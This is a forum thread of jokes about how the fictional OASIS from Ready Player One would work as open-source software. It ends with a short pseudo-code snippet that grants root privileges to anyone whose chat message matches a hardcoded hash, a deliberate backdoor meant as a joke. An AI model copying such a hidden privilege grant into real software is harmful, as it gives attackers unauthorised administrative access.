• @Klear
    link
    721 year ago

    Anyone who follows speedrunning knows the plot would be over before it started.

    • Zoidsberg
      link
      fedilink
      361 year ago

      The secret was just driving backwards? Would have been found in the first race.

      • R0cket_M00se
        link
        191 year ago

        I’d have found it in the first race and I’m not even a speed runner, I just like getting out of maps and finding glitches.

      • @Klear
        link
        31 year ago

        Haven’t seen the movie, the book was dumb as hell. Fun to read, but so dumb.

  • @MyFairJulia
    link
    42
    edit-2
    1 year ago

    OASIS will probably be based either on Java Minecraft, PrBoom, Quake or Mario 64 with a whole lot of patches by kaze emanuar.

  • JackGreenEarth
    link
    fedilink
    371 year ago

    The code of the OASIS client and all the servers but one could be open source, and only the code relating to the keys could be on a closed cource server.

      • JackGreenEarth
        link
        fedilink
        61 year ago

        I have! It was the movie I didn’t watch, as I found it a cringy attempt to adapt the (in all fairness, quite cringy) book. It was an enjoyable read, but it had its parts that were less… creative.

        • db2
          link
          fedilink
          01 year ago

          So then how could one server hide code for a pyramid that was distributed free to everyone as a template but could also be modified by the user as they saw fit?

          • JackGreenEarth
            link
            fedilink
            31 year ago

            I’m not sure specifically what part you’re talking about, but there are ways to make open source stuff not easily modifiable, eg, blockchain. As for the stuff he didn’t want everyone knowing, such as the keys and the clues, could be stored on a closed source private server.

            • db2
              link
              fedilink
              11 year ago

              The part where he has to go to a Tyrell building, but it’s easy to find because it’s a default free template everyone uses a lot.

  • @[email protected]
    link
    fedilink
    131 year ago

    Wake up sheepole The fact the guy likes the Shining and retro video games does not make him a good person, let alone someone who respects your freedom.

    I mean if you don’t know what the software in the headset that you own does… WTF?! It could be doing anything: What data does it collect? What do they do with that data? Even if you read and understood the license, they could be going against it without you ever finding out. Not even thinking about your right to modify what your headset does, or distributing your patches…

    I’m using FOSSasis, and I hope you guys make the switch as well. It’s free (as in freedom) and decentralized: meaning if you don’t like what a Server is doing (that what we call Worlds in FOSSasis), you can make your own, and you can still visit any Server that has not defederated from you. There are also plans to make it possible to transfer accounts between Servers. The economy is much fairer: every transaction is on the blockchain, so you know there is no manufactured Credit inflation.

    As for the stupid Easter Egg Hunt: let the slaves fight for who is going to be master… In FOSSasis we are all masters of our own destinies.

  • @[email protected]
    link
    fedilink
    111 year ago
    Event.register('on_say', function(e){
        if (Utils.sha(e.msg) == "da39a3ee5e6b4b0d3255bfef95601890afd80709"){
            ACL.grant_root_privs(e.usr)
        }
    })